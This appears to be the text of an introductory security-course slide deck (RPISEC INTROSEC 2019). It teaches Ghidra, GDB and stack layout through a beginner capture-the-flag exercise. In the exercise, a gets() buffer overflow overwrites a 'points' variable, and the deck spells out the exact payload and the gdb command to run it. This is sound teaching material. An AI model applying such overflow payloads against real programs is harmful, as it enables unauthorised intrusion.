1 of 41

How do programs work?

INTROSEC 2019

2 of 41

Obligatory links

3 of 41

In case you missed it

  • sudo apt install gcc-multilib
  • Password is ‘rpisec’

4 of 41

Tools we will be using (on the vm already)

  • Ghidra
  • GDB

5 of 41

What is a ghidra

  • Ghidra - A binary analysis toolset developed by the NSA and recently open sourced
    • Decompiler
    • Disassembler
    • Type system
    • Control flow graph
    • Exposes an api for all of this
    • And a lot more

6 of 41

For now Ghidra is just a static analysis platform

The NSA claims a debugger will be integrated soon™

For now we will just use GDB and just sync the two in our heads.

7 of 41

Ghidra 101

  • Tools VM has a convenient ghidra command in bash
    • If you’re on your own system, cd path/to/ghidra and then ./ghidraRun
  • Create a project
  • Import a binary
  • See lots of information (just press OK)
  • Double click your binary in the list
  • DRAGONS
  • Wow, that’s a lot of analysis options! Just use the defaults

8 of 41

Ghidra 101

It has a lot of features:

  • Symbols
    • Functions
  • Disassembly
  • Decompiler
  • Graph View

15 of 41

Ghidra 101

It has a lot of features:

  • Symbols
    • Functions
  • Disassembly
  • Decompiler
  • Graph View
  • Java … scripting??
    • Out of scope

16 of 41

How does a function get its arguments

Each block is 4 bytes of data (doubleword)

Registers such as ESP and EBP are a doubleword

0x00000000

……...

ESP ----------->

Local Var | param1

Local Var | param2

Local Var | param3

Local Var | param4

EBP ----------->

Local Var | param5

Previous EBP

Return address

0xffffffff

……...

17 of 41

DEMO TIME?

18 of 41

Stuff you kinda just gotta know

Two hex digits are one byte, so 0x00-0xff covers every value a byte can hold (0-255); 0xffff is 2 bytes, and so on.

When displaying bytes it is very common to use hex

At the end of the day, all data is just bytes. Your program chooses whether to treat them as ints, chars, etc... or even code.
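A minimal Python sketch of the "it's all just bytes" idea: the same four bytes read as text, as one 32-bit int, and as two 16-bit ints. The byte values are arbitrary, and little-endian order is assumed because that is what x86 uses.

```python
import struct

# Four arbitrary bytes; nothing about them says "text" or "number".
raw = bytes([0x41, 0x42, 0x43, 0x44])

as_text = raw.decode("ascii")            # treat them as chars
as_int_le = struct.unpack("<I", raw)[0]  # treat them as one little-endian 32-bit int
as_shorts = struct.unpack("<HH", raw)    # or as two little-endian 16-bit ints

print(raw.hex())                    # 41424344
print(as_text)                      # ABCD
print(hex(as_int_le))               # 0x44434241
print([hex(s) for s in as_shorts])  # ['0x4241', '0x4443']
```

The bytes never change; only the interpretation does.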

19 of 41

pwn100

Each block is 4 bytes of data (doubleword)

Chars are 1 byte

Ints are 4 bytes

Registers such as ESP and EBP are a doubleword

0x00000000

……...

ESP ----------->

foo[0:4]

foo[4:8]

foo[8:12]

foo[12:16]

foo[16:20]

Int points

EBP ----------->

Local Var | param5

20 of 41

pwn100

Let’s improve the disassembly

Name variables by pressing L

……...

local_28

local_24

local_20

local_1c

local_18

local_14

local_10

local_c

.........

21 of 41

pwn100

What do we name them?

Look at how they’re used and just make up something believable

……...

local_28

local_24

local_20

local_1c

local_18

local_14

local_10

local_c

.........

22 of 41

pwn100

Then just press L and rename

(Ghidra closes the graph view to refresh, just re-open it)

……...

local_28 ⇒ “name”

local_24

local_20

local_1c

local_18

local_14

local_10

local_c

.........

23 of 41

pwn100

Okay that seems to make sense

Protip: see all uses of a variable by middle-clicking it (Mac users: use a mouse or change it in the settings)

……...

local_28 ⇒ “name”

local_24

local_20

local_1c

local_18

local_14

local_10

local_c

.........

24 of 41

pwn100

Where are local_24 → local_18?

Ghidra thinks they are part of “name”

……...

local_28 ⇒ “name”[0:4]

local_24 ⇒ “name”[4:8]

local_20 ⇒ “name”[8:12]

local_1c ⇒ “name”[12:16]

local_18 ⇒ “name”[16:20]

local_14

local_10

local_c

.........

25 of 41

pwn100

local_14?

Looks like the points variable

……...

local_28 ⇒ “name”[0:4]

local_24 ⇒ “name”[4:8]

local_20 ⇒ “name”[8:12]

local_1c ⇒ “name”[12:16]

local_18 ⇒ “name”[16:20]

local_14 ⇒ “points”

local_10

local_c

.........

26 of 41

pwn100

local_c?

Isn’t used in the stuff we care about

……...

local_28 ⇒ “name”[0:4]

local_24 ⇒ “name”[4:8]

local_20 ⇒ “name”[8:12]

local_1c ⇒ “name”[12:16]

local_18 ⇒ “name”[16:20]

local_14 ⇒ “points”

local_10 ⇒ ¯\_(ツ)_/¯

local_c ⇒ ¯\_(ツ)_/¯

.........

27 of 41

pwn100

So the disassembly matches up with our expected stack frame layout

……...

foo[0:4]

foo[4:8]

foo[8:12]

foo[12:16]

foo[16:20]

Int points

……..

……...

local_28 ⇒ “name”[0:4]

local_24 ⇒ “name”[4:8]

local_20 ⇒ “name”[8:12]

local_1c ⇒ “name”[12:16]

local_18 ⇒ “name”[16:20]

local_14 ⇒ “points”

local_10 ⇒ ¯\_(ツ)_/¯

local_c ⇒ ¯\_(ツ)_/¯

.........
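The sizes can be double-checked with a little arithmetic. This is a rough sketch, assuming Ghidra's default local_XX names encode a hex stack offset and that a larger offset means a lower address, which is what the layout above suggests. The helper stack_offset is made up for illustration.

```python
def stack_offset(ghidra_name: str) -> int:
    """Return the hex offset encoded in a default name like 'local_28' (hypothetical helper)."""
    return int(ghidra_name.split("_")[1], 16)

name_start = stack_offset("local_28")    # 0x28
points_start = stack_offset("local_14")  # 0x14
next_start = stack_offset("local_10")    # 0x10

name_size = name_start - points_start    # bytes from the start of name up to points
points_size = points_start - next_start  # bytes from points up to the next local

print(name_size)    # 20
print(points_size)  # 4
```

20 bytes for name and 4 bytes for points lines up with foo[0:20] followed by an int.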

28 of 41

Back to pwning

So what does this function do?

  • A good place to look is at all the call instructions
  • puts, gets, printf, system
  • We want to get to system eventually

29 of 41

Back to pwning

How does gets work? Read the manual!

bash$ man gets

……...

local_28 ⇒ “name”[0:4]

local_24 ⇒ “name”[4:8]

local_20 ⇒ “name”[8:12]

local_1c ⇒ “name”[12:16]

local_18 ⇒ “name”[16:20]

local_14 ⇒ “points”

local_10 ⇒ ¯\_(ツ)_/¯

local_c ⇒ ¯\_(ツ)_/¯

.........

30 of 41

Back to pwning

So we read bytes into name with no check for buffer overrun...

……...

local_28 ⇒ “name”[0:4]

local_24 ⇒ “name”[4:8]

local_20 ⇒ “name”[8:12]

local_1c ⇒ “name”[12:16]

local_18 ⇒ “name”[16:20]

local_14 ⇒ “points”

local_10 ⇒ ¯\_(ツ)_/¯

local_c ⇒ ¯\_(ツ)_/¯

.........
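To see why the missing check matters, here is a small Python model of the stack frame. It is only a simulation: the frame size, the offsets, and the function unchecked_read are assumptions taken from the diagram, not from the real binary. Like gets, it copies everything up to the newline and then adds a terminating NUL byte, without caring how big name is.

```python
FRAME_SIZE = 28   # name (20) + points (4) + one more slot (4), as in the diagram
NAME_OFF = 0      # name starts at the lowest address in this model
POINTS_OFF = 20   # points sits right after the 20 bytes of name

def unchecked_read(frame: bytearray, data: bytes) -> None:
    """Copy one line into name with no length check, then NUL-terminate it."""
    line = data.split(b"\n", 1)[0] + b"\x00"
    frame[NAME_OFF:NAME_OFF + len(line)] = line

def read_points(frame: bytearray) -> int:
    """Interpret the 4 bytes at POINTS_OFF as a little-endian int."""
    return int.from_bytes(frame[POINTS_OFF:POINTS_OFF + 4], "little")

frame = bytearray(FRAME_SIZE)
unchecked_read(frame, b"short\n")
print(hex(read_points(frame)))   # 0x0, points untouched

frame = bytearray(FRAME_SIZE)
unchecked_read(frame, b"A" * 20 + b"BBBB\n")
print(hex(read_points(frame)))   # 0x42424242, points overwritten
```

Anything past the 20th byte of input lands in points.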

31 of 41

Back to pwning

gets writes into name, which is 20 bytes long and sits right below points (at a lower address), so anything past 20 bytes spills into points

……...

local_28 ⇒ “name”[0:4]

local_24 ⇒ “name”[4:8]

local_20 ⇒ “name”[8:12]

local_1c ⇒ “name”[12:16]

local_18 ⇒ “name”[16:20]

local_14 ⇒ “points”

local_10 ⇒ ¯\_(ツ)_/¯

local_c ⇒ ¯\_(ツ)_/¯

.........

32 of 41

Back to pwning

What if we spam the alphabet?

ABCDEFGHIJKLMNOPQRSTUVWXYZ

‘A’ == 0x41, ‘B’ == 0x42, etc.

man ascii

Endianness makes this confusing

……...

0x44 43 42 41 DCBA

local_28 ⇒ “name”[0:4]

0x48 47 46 45 HGFE

local_24 ⇒ “name”[4:8]

0x4c 4b 4a 49 LKJI

local_20 ⇒ “name”[8:12]

0x50 4f 4e 4d PONM

local_1c ⇒ “name”[12:16]

0x54 53 52 51 TSRQ

local_18 ⇒ “name”[16:20]

0x58 57 56 55 XWVU

local_14 ⇒ “points”

0x?? ?? 5a 59 ??ZY

local_10 ⇒ ¯\_(ツ)_/¯

...

local_c ⇒ ¯\_(ツ)_/¯

...

.........
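The table above can be reproduced in Python. This sketch assumes the same slot order as the diagram and reads each 4-byte chunk of the alphabet as a little-endian int, which is how x86 stores them.

```python
import string
import struct

alphabet = string.ascii_uppercase.encode("ascii")  # b"ABCDEFGHIJKLMNOPQRSTUVWXYZ"

# Slot names in the order the input fills them (lowest address first).
slots = ["local_28", "local_24", "local_20", "local_1c", "local_18", "local_14"]

values = {}
for i, slot in enumerate(slots):
    chunk = alphabet[4 * i:4 * i + 4]
    (value,) = struct.unpack("<I", chunk)  # first byte in memory is the least significant
    values[slot] = value
    print(f"{slot}: {chunk.decode()} in memory -> 0x{value:08x} as an int")
```

The bytes go into memory in the order typed (A, B, C, D), but the int reads as 0x44434241 because the first byte is the lowest one.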

33 of 41

Back to pwning

So we can set points to whatever we want

What does it need to be?

Check the cmp!

Oh, thanks Ghidra.

34 of 41

Side step to make Ghidra’s UI less bad

Edit the code layout and drag the Operands box

Government-quality UI right here, folks

35 of 41

… back to pwning

So we can set points to whatever we want

What does it need to be?

Check the cmp!

36 of 41

Back to pwning

So points ⇒ 0x1337d00d

Replacing the UVWX with those bytes

Again, endianness: 0d d0 37 13

……...

0x44 43 42 41 DCBA

local_28 ⇒ “name”[0:4]

0x48 47 46 45 HGFE

local_24 ⇒ “name”[4:8]

0x4c 4b 4a 49 LKJI

local_20 ⇒ “name”[8:12]

0x50 4f 4e 4d PONM

local_1c ⇒ “name”[12:16]

0x54 53 52 51 TSRQ

local_18 ⇒ “name”[16:20]

0x13 37 d0 0d ????

local_14 ⇒ “points”

0x?? ?? 5a 59 ??ZY

local_10 ⇒ ¯\_(ツ)_/¯

...

local_c ⇒ ¯\_(ツ)_/¯

...

.........

37 of 41

Back to pwning

So our final input is ABCDEFGHIJKLMNOPQRST\x0d\xd0\x37\x13

Time to gdb!

……...

0x44 43 42 41 DCBA

local_28 ⇒ “name”[0:4]

0x48 47 46 45 HGFE

local_24 ⇒ “name”[4:8]

0x4c 4b 4a 49 LKJI

local_20 ⇒ “name”[8:12]

0x50 4f 4e 4d PONM

local_1c ⇒ “name”[12:16]

0x54 53 52 51 TSRQ

local_18 ⇒ “name”[16:20]

0x13 37 d0 0d .7Ð.

local_14 ⇒ “points”

0x?? ?? ?? 00 ???.

local_10 ⇒ ¯\_(ツ)_/¯

...

local_c ⇒ ¯\_(ツ)_/¯

...

.........
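The input above can also be built in Python instead of by hand. A minimal sketch: the 20 bytes of padding are the same letters as before, and struct.pack takes care of the byte order for points.

```python
import struct

TARGET = 0x1337d00d                # value points needs to hold
padding = b"ABCDEFGHIJKLMNOPQRST"  # 20 bytes to fill name

# "<I" = little-endian unsigned 32-bit int, so the bytes come out as 0d d0 37 13.
payload = padding + struct.pack("<I", TARGET)

print(len(payload))         # 24
print(payload[20:].hex())   # 0dd03713
```

None of the four packed bytes is a newline (0x0a), so gets reads all of them.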

38 of 41

GDB shows us how it works

Feel free to look at the older slides for how to GDB

Protip: Run python in gdb so you can debug weird input

gdb-peda$ run < <(python -c 'print("\x41\x41\x41\x41")')

^ This spacing is necessary. Thanks, gdb!
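One thing to watch for if python on your system is Python 3: print works on text, so a character like "\xd0" gets encoded as two UTF-8 bytes on a typical UTF-8 terminal and the payload ends up the wrong length. A hedged workaround is to write raw bytes to a file and redirect that into the program with run < file. The file name payload.bin and the helper write_payload are made up for this sketch.

```python
import os
import tempfile

def write_payload(path: str, payload: bytes) -> None:
    """Write raw bytes plus a trailing newline so gets sees the end of the line."""
    with open(path, "wb") as f:
        f.write(payload + b"\n")

# What Python 3 text output does to the same four characters under UTF-8:
as_text = "\x0d\xd0\x37\x13".encode("utf-8")
as_bytes = b"\x0d\xd0\x37\x13"
print(len(as_text), len(as_bytes))   # 5 4

# payload.bin is a hypothetical file name; put it wherever is convenient.
path = os.path.join(tempfile.gettempdir(), "payload.bin")
write_payload(path, b"ABCDEFGHIJKLMNOPQRST" + as_bytes)
print(path)
```

Then in gdb: run < /path/to/payload.bin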

39 of 41

Demo

gdb-peda$ run < <(python -c 'print("\x41\x41\x41\x41")')

^ This spacing is necessary. Thanks, gdb!

40 of 41

Demo

Remember branchier from Friday?

41 of 41

Next Steps

  • Check out the decompiler!
    • … wow that’s a lot easier to read
  • Look at some other programs
    • Try the examples from Friday
    • https://pwnable.kr (try ‘bof’)
    • https://crackmes.one/search (try some very easy/easy challenges to get used to looking at binaries)
  • We’re continuing on Friday with pwn200
    • If you feel adventurous, try it :)